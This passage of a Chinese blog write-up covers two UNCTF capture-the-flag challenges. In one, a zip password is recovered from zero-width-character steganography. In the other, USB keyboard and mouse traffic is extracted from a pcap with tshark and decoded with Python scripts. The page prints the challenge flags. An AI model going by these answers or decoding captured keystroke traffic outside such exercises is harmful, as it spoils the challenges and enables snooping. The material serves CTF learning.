<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116214738335.png"></p>
<p>解压后，在txt文件里发现零宽度字符隐写，尝试解密，发现是乱码，想到明文攻击，于是删掉零宽度字符，重新新建一个txt文件，发现和压缩包里的txt文件大小相同，CRC值也相同，于是用ARCHPR进行明文攻击</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221116214856294.png"></p>
<p>尝试爆破十几个小时没出来，想到零宽度字符隐写还有二进制格式</p>
<p><a target="_blank" rel="noopener" href="https://www.mzy0.com/ctftools/zerowidth1/">https://www.mzy0.com/ctftools/zerowidth1/</a></p>
<p>在在线网站提取二进制数据，得到密码</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221118080818388.png"></p>
<p>然后用密码打开flag.zip，得到flag</p>
<p>unctf{d4a3a242-cd32-4dd5-bac6-84bdf13f527f}</p>
<h2 id="CatchJerry-华中科技大学"><a href="#CatchJerry-华中科技大学" class="headerlink" title="CatchJerry-华中科技大学"></a>CatchJerry-华中科技大学</h2><p>首先用tshark提取键盘和鼠标流量</p>
<pre><code>tshark.exe -r CatchJerry.pcap -T fields -e usbhid.data &gt; usbdata.txt
</code></pre>
<p>得到的数据是没有冒号的，可以去网上找一个转化成带冒号的数据的脚本</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221117170958166.png"></p>
<pre class=" language-python"><code class="language-python">键盘流量转换脚本
mappings <span class="token operator">=</span> <span class="token operator">&amp;</span><span class="token comment" spellcheck="true">#123; 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." &amp;#125;</span>
nums <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
keys <span class="token operator">=</span> open<span class="token punctuation">(</span><span class="token string">'out.txt'</span><span class="token punctuation">)</span>
<span class="token keyword">for</span> line <span class="token keyword">in</span> keys<span class="token punctuation">:</span>
    <span class="token keyword">if</span> line<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">9</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">10</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">12</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">13</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">15</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">16</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">18</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">19</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">21</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span> <span class="token operator">or</span> line<span class="token punctuation">[</span><span class="token number">22</span><span class="token punctuation">]</span><span class="token operator">!=</span><span class="token string">'0'</span><span class="token punctuation">:</span>
         <span class="token keyword">continue</span>
    nums<span class="token punctuation">.</span>append<span class="token punctuation">(</span>int<span class="token punctuation">(</span>line<span class="token punctuation">[</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token comment" spellcheck="true"># 00:00:xx:....</span>
keys<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
output <span class="token operator">=</span> <span class="token string">""</span>
<span class="token keyword">for</span> n <span class="token keyword">in</span> nums<span class="token punctuation">:</span>
    <span class="token keyword">if</span> n <span class="token operator">==</span> <span class="token number">0</span> <span class="token punctuation">:</span>
        <span class="token keyword">continue</span>
    <span class="token keyword">if</span> n <span class="token keyword">in</span> mappings<span class="token punctuation">:</span>
        output <span class="token operator">+=</span> mappings<span class="token punctuation">[</span>n<span class="token punctuation">]</span>
    <span class="token keyword">else</span><span class="token punctuation">:</span>
        output <span class="token operator">+=</span> <span class="token string">'[unknown]'</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">'output :n'</span> <span class="token operator">+</span> output<span class="token punctuation">)</span>
</code></pre>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221117171417528.png"></p>
<pre class=" language-python"><code class="language-python">鼠标流量转换脚本
nums <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
keys <span class="token operator">=</span> open<span class="token punctuation">(</span><span class="token string">'out.txt'</span><span class="token punctuation">,</span><span class="token string">'r'</span><span class="token punctuation">)</span>
f <span class="token operator">=</span> open<span class="token punctuation">(</span><span class="token string">'xy.txt'</span><span class="token punctuation">,</span><span class="token string">'w'</span><span class="token punctuation">)</span>
posx <span class="token operator">=</span> <span class="token number">0</span>
posy <span class="token operator">=</span> <span class="token number">0</span>
<span class="token keyword">for</span> line <span class="token keyword">in</span> keys<span class="token punctuation">:</span>
    x <span class="token operator">=</span> int<span class="token punctuation">(</span>line<span class="token punctuation">[</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token number">5</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>
    y <span class="token operator">=</span> int<span class="token punctuation">(</span>line<span class="token punctuation">[</span><span class="token number">6</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> x <span class="token operator">></span> <span class="token number">127</span> <span class="token punctuation">:</span>
        x <span class="token operator">-=</span> <span class="token number">256</span>
    <span class="token keyword">if</span> y <span class="token operator">></span> <span class="token number">127</span> <span class="token punctuation">:</span>
        y <span class="token operator">-=</span> <span class="token number">256</span>
    posx <span class="token operator">+=</span> x
    posy <span class="token operator">+=</span> y
    btn_flag <span class="token operator">=</span> int<span class="token punctuation">(</span>line<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">,</span><span class="token number">16</span><span class="token punctuation">)</span>  <span class="token comment" spellcheck="true"># 1 for left , 2 for right , 0 for nothing</span>
    <span class="token keyword">if</span> btn_flag <span class="token operator">==</span> <span class="token number">1</span> <span class="token punctuation">:</span> <span class="token comment" spellcheck="true"># 1 代表左键</span>
        f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>str<span class="token punctuation">(</span>posx<span class="token punctuation">)</span><span class="token punctuation">)</span>
        f<span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token string">' '</span><span class="token punctuation">)</span>
        f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>str<span class="token punctuation">(</span><span class="token operator">-</span>posy<span class="token punctuation">)</span><span class="token punctuation">)</span>
        f<span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token string">'\n'</span><span class="token punctuation">)</span>

f<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
<p>转换好之后用gnuplot绘图</p>
<p><img src="/images/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/image-20221117170926142.png"></p>
<p>然后把鼠标流量和键盘流量结合起来就得到flag</p>
<p>UNCTF{TOM_AND_JERRY_BEST_FRIENDS}</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">qingyuchuxue</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://qingyuchuxue.github.io/2022/11/21/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/">https://qingyuchuxue.github.io/2022/11/21/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">qingyuchuxue</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2022/11/21/%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-%E6%99%B4%E9%9B%A8%E5%88%9D%E9%9B%AA-UNCTF-WP/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-11-21
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            qingyuchuxue
                            
                        </span>
                    </div>
                </div>

                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2022/11/06/paillier%20cryptosystem/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="">
                        
                        <span class="card-title"></span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-11-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            qingyuchuxue
                            
                        </span>
                    </div>
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>



<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">qingyuchuxue</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">5k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/qingyuchuxue" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1302153027@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1302153027" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1302153027" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 白天和黑夜主题 -->
<div class="stars-con">
    <div id="stars"></div>
    <div id="stars2"></div>
    <div id="stars3"></div>  
</div>

<script>
    function switchNightMode() {
        $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
        setTimeout(function () {
            $('body').hasClass('DarkMode') 
            ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
            : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
            
            setTimeout(function () {
            $('.Cuteen_DarkSky').fadeOut(1e3, function () {
                $(this).remove()
            })
            }, 2e3)
        })
    }
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
